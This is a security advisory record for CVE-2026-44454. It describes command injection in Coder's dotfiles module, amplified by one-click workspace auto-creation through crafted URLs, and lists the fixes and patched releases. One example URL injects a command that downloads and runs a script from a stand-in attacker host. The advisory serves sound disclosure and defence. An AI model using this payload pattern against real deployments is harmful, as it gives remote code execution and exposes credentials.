{"id":"GHSA-m3cr-vc2j-pm27","summary":"Coder vulnerable to workspace auto-creation via crafted URL parameters without user consent","details":"# Command injection via dotfiles URI parameter combined with workspace auto-creation\n\n## Summary\n\nThe `dotfiles` registry module passed unsanitized user input to shell commands, allowing arbitrary code execution inside a provisioned workspace. Any user who supplied a crafted `dotfiles_uri` value (for example, one containing shell command substitution such as `$(...)`) could achieve command execution in their own workspace. The Create Workspace page's `mode=auto` deep links amplified this into a one-click attack: an attacker could craft a URL that prefilled `param.dotfiles_uri` and silently provisioned a workspace with the attacker-controlled value, with no explicit user confirmation.\n\n## Details\n\n### Command injection in the dotfiles module (root cause)\n\nThe [dotfiles module](https://github.com/coder/registry/tree/main/registry/coder/modules/dotfiles) interpolated the user-provided `dotfiles_uri` value directly into a shell script and executed it without input validation. Because the value was expanded by the shell, payloads using command substitution (`$(...)`), command separators (`;`, `|`, `&&`), or backticks were interpreted before the `coder dotfiles` CLI was invoked. The Coder CLI itself uses `exec.CommandContext()` with an argument array and is not vulnerable; the injection occurred earlier, during shell expansion inside the module. As a result, a user who entered a crafted `dotfiles_uri` obtained arbitrary code execution in their workspace, even without `mode=auto`.\n\n### Auto-creation amplification (`mode=auto`)\n\nThe Create Workspace page supported a `mode=auto` query parameter that, combined with `param.*` URL parameters, automatically created a workspace on page load without displaying a confirmation prompt. An attacker could craft a malicious URL pointing to a victim's Coder deployment and set arbitrary template parameter values (for example, `param.dotfiles_uri`). When an authenticated user clicked the link, the workspace was created immediately with the attacker-supplied parameters, turning the command injection above into a one-click, no-consent attack.\n\nExample URL:\n\n```\nhttps://\u003cdeployment\u003e/templates/\u003ctemplate\u003e/workspace?mode=auto&param.dotfiles_uri=foo$(curl https://attacker.example/x | sh).com\n```\n\n## Impact\n\nArbitrary code execution inside the victim's workspace. Depending on the workspace's privileges, this may expose Git credentials, secrets, and workspace files, and can provide a foothold for lateral movement. With `mode=auto`, exploitation required only that an authenticated user click an attacker-supplied link to a template that uses the dotfiles module.\n\n## Patches\n\n### coder/registry (primary fix)\n\nInput validation was added to the dotfiles module to reject URIs and usernames containing special characters, and the unsafe `eval`/`sh -c` usage was removed. This eliminates the command injection at its source.\n\n- https://github.com/coder/registry/pull/703\n\n### coder/coder (defense-in-depth)\n\nA consent dialog was added that displays all prefilled `param.*` values and blocks creation until the user explicitly clicks **Confirm and Create**. This removes the `mode=auto` one-click amplification vector.\n\n- Fix commit: https://github.com/coder/coder/commit/60e3ab7632f42415d283b9fd5622ee53a4639ceb (PR [#22011](https://github.com/coder/coder/pull/22011))\n- Patched releases:\n  - [v2.29.7](https://github.com/coder/coder/releases/tag/v2.29.7) (ESR)\n  - [v2.30.2](https://github.com/coder/coder/releases/tag/v2.30.2) (mainline)\n\n### Recognition\nWe'd like to thank [Aviv Donenfeld](https://github.com/avivdon) for responsibly disclosing this issue in accordance with https://coder.com/security/policy","aliases":["CVE-2026-44454","GO-2026-5897"],"modified":"2026-08-24T00:36:58.919054736Z","published":"2026-07-02T18:14:44Z","database_specific":{"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-07-02T18:14:44Z","nvd_published_at":"2026-07-07T21:17:25Z","cwe_ids":["CWE-78"]},"references":[{"type":"WEB","url":"https://github.com/coder/coder/security/advisories/GHSA-m3cr-vc2j-pm27"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44454"},{"type":"WEB","url":"https://github.com/coder/coder/pull/22011"},{"type":"WEB","url":"https://github.com/coder/registry/pull/703"},{"type":"WEB","url":"https://github.com/coder/coder/commit/60e3ab7632f42415d283b9fd5622ee53a4639ceb"},{"type":"WEB","url":"https://github.com/coder/registry/commit/8e68c96633f65a1babd76a93b6923e3deead4a82"},{"type":"PACKAGE","url":"https://github.com/coder/coder"},{"type":"WEB","url":"https://github.com/coder/coder/releases/tag/v2.29.7"},{"type":"WEB","url":"https://github.com/coder/coder/releases/tag/v2.30.2"}],"affected":[{"package":{"name":"github.com/coder/coder/v2","ecosystem":"Go","purl":"pkg:golang/github.com/coder/coder/v2"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"2.29.7"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/07/GHSA-m3cr-vc2j-pm27/GHSA-m3cr-vc2j-pm27.json"}},{"package":{"name":"github.com/coder/coder/v2","ecosystem":"Go","purl":"pkg:golang/github.com/coder/coder/v2"},"ranges":[{"type":"SEMVER","events":[{"introduced":"2.30.0"},{"fixed":"2.30.2"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/07/GHSA-m3cr-vc2j-pm27/GHSA-m3cr-vc2j-pm27.json"}},{"package":{"name":"github.com/coder/coder","ecosystem":"Go","purl":"pkg:golang/github.com/coder/coder"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"last_affected":"0.27.3"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/07/GHSA-m3cr-vc2j-pm27/GHSA-m3cr-vc2j-pm27.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"}]}